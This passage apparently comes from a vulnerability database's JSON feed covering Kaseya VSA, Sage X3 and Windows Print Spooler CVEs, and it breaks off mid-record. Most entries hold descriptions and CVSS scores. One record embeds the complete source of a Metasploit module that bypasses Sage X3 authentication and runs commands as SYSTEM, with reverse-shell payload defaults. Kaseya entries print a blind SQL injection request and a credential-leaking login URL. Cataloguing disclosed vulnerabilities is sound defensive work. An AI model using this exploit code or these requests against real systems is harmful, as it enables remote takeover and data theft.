(https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "prion", "title": "Authentication flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2023-10-23T14:15:00", "id": "PRION:CVE-2021-30116", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:46:09", "description": "Sage X3 System CHAINE Variable Script Command Injection. An authenticated user with developer access can pass OS commands via this variable used by the web application. Note, this developer configuration should not be deployed in production.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T19:15:00", "type": "prion", "title": "Command injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7389"], "modified": "2022-07-15T17:51:00", "id": "PRION:CVE-2020-7389", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-7389", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:46:09", "description": "Sage X3 Stored XSS Vulnerability on \u2018Edit\u2019 Page of User Profile. An authenticated user can pass XSS strings the \"First Name,\" \"Last Name,\" and \"Email Address\" fields of this web application component. Updates are available for on-premises versions of Version 12 (components shipped with Syracuse 12.10.0 and later) of Sage X3. Other on-premises versions of Sage X3 are unaffected or unsupported by the vendor.", "cvss3": {"cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2021-07-22T19:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.9, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7390"], "modified": "2023-11-07T03:26:00", "id": "PRION:CVE-2020-7390", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-7390", "cvss": {"score": 4.9, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2023-11-22T03:48:32", "description": "Directory traversal vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote authenticated users to read arbitrary files via a crafted HTTP request.", "cvss3": {}, "published": "2015-07-20T23:59:00", "type": "prion", "title": "Directory traversal", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2862"], "modified": "2019-02-05T19:25:00", "id": "PRION:CVE-2015-2862", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-2862", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T00:53:29", "description": "Windows Print Spooler Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T22:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-02T21:08:00", "id": "PRION:CVE-2021-34527", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-34527", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-12-03T17:20:42", "description": "This Metasploit module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an available AdxAdmin service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T00:00:00", "type": "zdt", "title": "Sage X3 Administration Service Authentication Bypass / Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-07-21T00:00:00", "id": "1337DAY-ID-36584", "href": "https://0day.today/exploit/description/36584", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',\n 'Description' => %q{\n This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.\n },\n 'Author' => [\n 'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk\n 'Aaron Herndon' # @ac3lives\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2021-07-07',\n 'References' =>\n [\n ['CVE', '2020-7387'], # Infoleak\n ['CVE', '2020-7388'], # RCE\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ],\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'CMD' => 'whoami'\n }\n }\n ],\n [\n 'Windows DLL',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Executable',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(1818)\n ]\n )\n end\n\n def vprint(msg = '')\n print(msg) if datastore['VERBOSE']\n end\n\n def check\n s = connect\n print_status('Connected')\n\n # ADXDIR command authentication header\n # allows for unauthenticated retrieval of X3 directory\n auth_packet = \"\\x09\\x00\"\n s.write(auth_packet)\n\n # recv response\n res = s.read(1024)\n\n if res.nil? || res.length != 4\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n if res.chars == [\"\\xFF\", \"\\xFF\", \"\\xFF\", \"\\xFF\"]\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n print_good('ADXDIR authentication successful.')\n\n # ADXDIR command\n adx_dir_msg = \"\\x07\\x41\\x44\\x58\\x44\\x49\\x52\\x00\"\n s.write(adx_dir_msg)\n directory = s.read(1024)\n\n return CheckCode::Safe if directory.nil?\n\n sagedir = directory[4..-2]\n print_good(format('Received directory info from host: %s', sagedir))\n disconnect\n\n CheckCode::Vulnerable(details: { sagedir: sagedir })\n rescue Rex::ConnectionError\n CheckCode::Unknown\n end\n\n def build_buffer(head, sage_payload, tail)\n buffer = ''\n\n # do things\n buffer << head if head\n buffer << sage_payload.length\n buffer << sage_payload\n buffer << tail if tail\n\n buffer\n end\n\n def write_file(sock, filenum, sage_payload, target, sagedir)\n s = sock\n\n # building the initial authentication packet\n # [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]\n # Note: the first byte of this auth packet is different from the ADXDIR command\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n s.write(\"\\x06\\x00\")\n auth_resp = s.read(1024)\n\n fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4\n\n print_good('Command authentication successful.')\n\n # May require additional information such as file path\n # this will be used for multiple messages\n\n head = \"\\x00\\x00\\x36\\x02\\x00\\x2e\\x00\" # head\n fmt = '@%s/tmp/cmd%s$cmd'\n fmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL'\n fmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable'\n pload = format(fmt, revsagedir, filenum)\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, pload, tail)\n s.write(sendbuf)\n s.read(1024)\n\n # Packet --- 3\n # Creating the packet that contains the command to run\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n\n # this writes the data to the .cmd file to get executed\n # a single write can't be larger than ~250 bytes\n # so writes larger than 250 need to be broken up\n written = 0\n print_status('Writing data')\n\n while written < sage_payload.length\n vprint('.')\n\n towrite = sage_payload[written..written + 250]\n sendbuf = build_buffer(head, towrite, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n written += towrite.length\n end\n\n vprint(\"\\r\\n\")\n end\n\n def exploit\n sage_payload = payload.encoded if target.name == 'Windows Command'\n sage_payload = generate_payload_dll if target.name == 'Windows DLL'\n sage_payload = generate_payload_exe if target.name == 'Windows Executable'\n\n sagedir = check.details[:sagedir]\n\n if sagedir.nil?\n fail_with(Failure::NotVulnerable,\n 'No directory was returned by the remote host, may not be vulnerable')\n end\n\n if sagedir.end_with?('AdxAdmin')\n register_dir_for_cleanup(\"#{sagedir}\\\\tmp\")\n end\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n filenum = rand_text_numeric(8)\n vprint_status(format('Using generated filename: %s', filenum))\n\n s = connect\n\n write_file(s, filenum, sage_payload, target.name, sagedir)\n\n unless target.name == 'Windows Command'\n disconnect\n # re-establish connection after writing file\n s = connect\n end\n\n if target.name == 'Windows DLL'\n sage_payload = \"rundll32.exe #{sagedir}\\\\tmp\\\\cmd#{filenum}.dll,0\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n if target.name == 'Windows Executable'\n sage_payload = \"#{sagedir}\\\\tmp\\\\cmd#{filenum}.exe\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n # Some sort of delimiter\n delim0 = \"\\x02\\x00\\x01\\x01\" # bufm\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 4\n sage_payload = \"@#{revsagedir}/tmp/sess#{filenum}$cmd\"\n head = \"\\x00\\x00\\x37\\x02\\x00\\x2f\\x00\"\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 5\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n sage_payload = \"@echo off\\r\\n#{sagedir}\\\\tmp\\\\cmd#{filenum}.cmd 1>#{sagedir}\\\\tmp\\\\#{filenum}.out 2>#{sagedir}\\\\tmp\\\\#{filenum}.err\\r\\n@echo on\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 6\n head = \"\\x00\\x00\\x36\\x04\\x00\\x2e\\x00\"\n sage_payload = \"#{revsagedir}\\\\tmp\\\\sess#{filenum}.cmd\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # if it's not COMMAND, we can stop here\n # otherwise, we'll send/recv the last bit\n # of info for the output\n unless target.name == 'Windows Command'\n disconnect\n return\n end\n\n # Packet --- Delim\n delim1 = \"\\x02\\x00\\x05\\x05\\x00\\x00\\x10\\x00\"\n s.write(delim1)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # The two below are directing the server to read from the .out file that should have been created\n # Then we get the output back\n # Packet --- 7 - Still works when removed.\n head = \"\\x00\\x00\\x2f\\x07\\x08\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 8\n head = \"\\x00\\x00\\x33\\x02\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n s.write(delim1)\n returned_data = s.recv(8096).strip!\n\n if returned_data.nil? || returned_data.empty?\n disconnect\n fail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again')\n end\n\n print_good('------------ Response Received ------------')\n print_status(returned_data)\n disconnect\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36584", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-08-10T10:44:55", "description": "Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 08, 2021 3:54pm UTC reported:\n\nPlease see the [blog post](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>) for more information. An [exploit](<https://github.com/rapid7/metasploit-framework/pull/15400>) has been posted. For all intents and purposes, this is unauthenticated RCE. A [patch](<https://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches>) is available.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {}, "published": "2021-07-07T00:00:00", "type": "attackerkb", "title": "CVE-2020-7388", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-08-10T00:00:00", "id": "AKB:E22D11BC-89F5-42AA-B31B-78D5E22902DB", "href": "https://attackerkb.com/topics/q0ETmshZPW/cve-2020-7388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:36:20", "description": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description \u2014\u2013 Given the following request: `GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: `HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /> <link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link> ----SNIP----` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: `GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;` Response: `HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP -----`\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-30117", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117"], "modified": "2023-10-07T00:00:00", "id": "AKB:D51087FF-AE7C-4A0E-9BA9-F897BA18D238", "href": "https://attackerkb.com/topics/1KBaJEE0fi/cve-2021-30117", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:41:42", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is <https://x.x.x.x/dl.asp> When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp ([https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9](<https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9>)) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered \u2014\u2013 * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact \u2014\u2013 Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-30116", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2023-10-07T00:00:00", "id": "AKB:923F0E8E-CF44-416D-A421-F2177898261A", "href": "https://attackerkb.com/topics/9rki8uOHTf/cve-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:33:50", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**kevthehermit** at June 30, 2021 1:53pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**andretorresbr** at July 02, 2021 2:37am UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**architect00** at July 01, 2021 1:46pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**NinjaOperator** at June 29, 2021 5:55pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing 